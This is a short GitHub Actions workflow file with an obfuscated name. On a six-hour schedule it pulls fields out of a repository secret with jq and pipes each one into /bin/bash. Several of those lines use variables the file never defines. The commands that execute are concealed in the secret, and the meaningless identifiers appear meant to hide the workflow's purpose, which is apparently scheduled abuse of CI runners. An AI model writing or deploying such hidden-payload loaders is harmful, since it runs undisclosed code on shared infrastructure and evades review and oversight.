name: peixuan19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '20 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: peixuan19871010
        env:
          vre73: ${{ secrets.vre73 }}
        run: |
          echo $vre73 | jq -r .ztm38244 | /bin/bash
          echo $t16 | jq -r .rhvfq59 | /bin/bash
          echo $pmy279 | jq -r .wc4922 | /bin/bash
          echo $to331 | jq -r .gqdij4606 | /bin/bash
          echo $q055 | jq -r .xbvnc3712 | /bin/bash
          echo $p9 | jq -r .s93 | /bin/bash
          echo $ie842 | jq -r .pc4 | /bin/bash

